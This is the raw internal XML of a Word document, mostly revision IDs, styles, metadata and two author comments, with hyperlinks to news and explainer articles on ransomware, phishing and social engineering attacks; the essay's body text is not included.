    </w:p>
    <w:sectPr w:rsidR="000E3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tavya Datta" w:date="2022-01-30T17:26:00Z" w:initials="SD">
    <w:p w14:paraId="40A759E6" w14:textId="0F614EEA" w:rsidR="005243EC" w:rsidRDefault="005243EC">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Should I write it like this?</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Stavya Datta" w:date="2022-01-30T17:31:00Z" w:initials="SD">
    <w:p w14:paraId="575CAEA2" w14:textId="62F9B10B" w:rsidR="00CA74A3" w:rsidRDefault="00CA74A3">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Is this funny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0A759E6" w15:done="0"/>
  <w15:commentEx w15:paraId="575CAEA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148C3" w16cex:dateUtc="2022-01-30T11:56:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="25A149E6" w16cex:dateUtc="2022-01-30T12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A759E6" w16cid:durableId="25A148C3"/>
  <w16cid:commentId w16cid:paraId="575CAEA2" w16cid:durableId="25A149E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vya Datta">
    <w15:presenceInfo w15:providerId="None" w15:userId="Stavya Datt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szA1NjAyNTEysjBS0lEKTi0uzszPAykwrgUAFEEfYywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00250A4D"/>
    <w:rsid w:val="00012B60"/>
    <w:rsid w:val="000166CC"/>
    <w:rsid w:val="00052ADD"/>
    <w:rsid w:val="0008278B"/>
    <w:rsid w:val="00096590"/>
    <w:rsid w:val="000C4061"/>
    <w:rsid w:val="000C7085"/>
    <w:rsid w:val="000E3E5C"/>
    <w:rsid w:val="00131E2E"/>
    <w:rsid w:val="00186E6D"/>
    <w:rsid w:val="001928E8"/>
    <w:rsid w:val="001A40F3"/>
    <w:rsid w:val="00214E34"/>
    <w:rsid w:val="00250A4D"/>
    <w:rsid w:val="002D0AA6"/>
    <w:rsid w:val="002D2B2D"/>
    <w:rsid w:val="00311AFD"/>
    <w:rsid w:val="00312A16"/>
    <w:rsid w:val="00333BC5"/>
    <w:rsid w:val="0039704D"/>
    <w:rsid w:val="003C51BB"/>
    <w:rsid w:val="003D40D0"/>
    <w:rsid w:val="0049772F"/>
    <w:rsid w:val="004B0C01"/>
    <w:rsid w:val="004F2A2E"/>
    <w:rsid w:val="004F36FF"/>
    <w:rsid w:val="005243EC"/>
    <w:rsid w:val="00527A80"/>
    <w:rsid w:val="00557763"/>
    <w:rsid w:val="005C6F20"/>
    <w:rsid w:val="005E2F9E"/>
    <w:rsid w:val="00626429"/>
    <w:rsid w:val="00646AAD"/>
    <w:rsid w:val="00665F6F"/>
    <w:rsid w:val="00694A20"/>
    <w:rsid w:val="006B1656"/>
    <w:rsid w:val="006D0261"/>
    <w:rsid w:val="006E447F"/>
    <w:rsid w:val="00726B0D"/>
    <w:rsid w:val="00741DEE"/>
    <w:rsid w:val="007470CD"/>
    <w:rsid w:val="007B1B5E"/>
    <w:rsid w:val="007F1357"/>
    <w:rsid w:val="007F174D"/>
    <w:rsid w:val="007F7FF3"/>
    <w:rsid w:val="008175EF"/>
    <w:rsid w:val="00826F22"/>
    <w:rsid w:val="00846604"/>
    <w:rsid w:val="008A7D74"/>
    <w:rsid w:val="00914155"/>
    <w:rsid w:val="00933CA8"/>
    <w:rsid w:val="00973201"/>
    <w:rsid w:val="009E0C76"/>
    <w:rsid w:val="00A02F90"/>
    <w:rsid w:val="00A81E25"/>
    <w:rsid w:val="00A87C60"/>
    <w:rsid w:val="00AD29AD"/>
    <w:rsid w:val="00B02C46"/>
    <w:rsid w:val="00B4164D"/>
    <w:rsid w:val="00B77C6E"/>
    <w:rsid w:val="00B8698D"/>
    <w:rsid w:val="00BB4903"/>
    <w:rsid w:val="00BB6171"/>
    <w:rsid w:val="00BC269E"/>
    <w:rsid w:val="00BD2D51"/>
    <w:rsid w:val="00BD6197"/>
    <w:rsid w:val="00BF70AC"/>
    <w:rsid w:val="00C20C11"/>
    <w:rsid w:val="00C25510"/>
    <w:rsid w:val="00C264DF"/>
    <w:rsid w:val="00C35695"/>
    <w:rsid w:val="00C35E7B"/>
    <w:rsid w:val="00C37740"/>
    <w:rsid w:val="00C74DC3"/>
    <w:rsid w:val="00C76007"/>
    <w:rsid w:val="00C84952"/>
    <w:rsid w:val="00C9645E"/>
    <w:rsid w:val="00CA4052"/>
    <w:rsid w:val="00CA56A3"/>
    <w:rsid w:val="00CA74A3"/>
    <w:rsid w:val="00CE0222"/>
    <w:rsid w:val="00CF01DD"/>
    <w:rsid w:val="00D03200"/>
    <w:rsid w:val="00D37705"/>
    <w:rsid w:val="00D445B6"/>
    <w:rsid w:val="00D944AE"/>
    <w:rsid w:val="00DB218D"/>
    <w:rsid w:val="00DD6E0E"/>
    <w:rsid w:val="00E07955"/>
    <w:rsid w:val="00E753D3"/>
    <w:rsid w:val="00E85CAE"/>
    <w:rsid w:val="00EE0F91"/>
    <w:rsid w:val="00EE10D5"/>
    <w:rsid w:val="00EE198A"/>
    <w:rsid w:val="00EE2F7A"/>
    <w:rsid w:val="00F14222"/>
    <w:rsid w:val="00F211A0"/>
    <w:rsid w:val="00F21F37"/>
    <w:rsid w:val="00F32508"/>
    <w:rsid w:val="00F4396A"/>
    <w:rsid w:val="00F803BD"/>
    <w:rsid w:val="00F86F8A"/>
    <w:rsid w:val="00F906AC"/>
    <w:rsid w:val="00FC031E"/>
    <w:rsid w:val="00FC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3485A"/>
  <w15:docId w15:val="{9F7AA69B-D997-4F8D-89AF-10E6F5669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32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32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6E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F325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73201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73201"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="graf">
    <w:name w:val="graf"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00012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012B60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12B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2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F3250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F32508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6E6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24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4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43EC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445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44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com.ar" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/computer-giant-acer-hit-by-50-million-ransomware-attack/" TargetMode="Externa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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://whatis.techtarget.com/feature/Colonial-Pipeline-hack-explained-Everything-you-need-to-know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microsoft.com/office/2011/relationships/people" Target="people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hyperlink" Target="https://www.imperva.com/learn/application-security/phishing-attack-scam/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/learn/application-security/social-engineering-attack/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comments.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aljazeera.com/news/2022/1/15/russia-says-it-took-down-revil-hacking-group-at-us-requ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0</TotalTime>
  <Pages>3</Pages>
  <Words>763</Words>
  <Characters>435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vya Datta</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Stavya Datta</cp:lastModifiedBy>
  <cp:revision>60</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-28T18:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-02T11:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>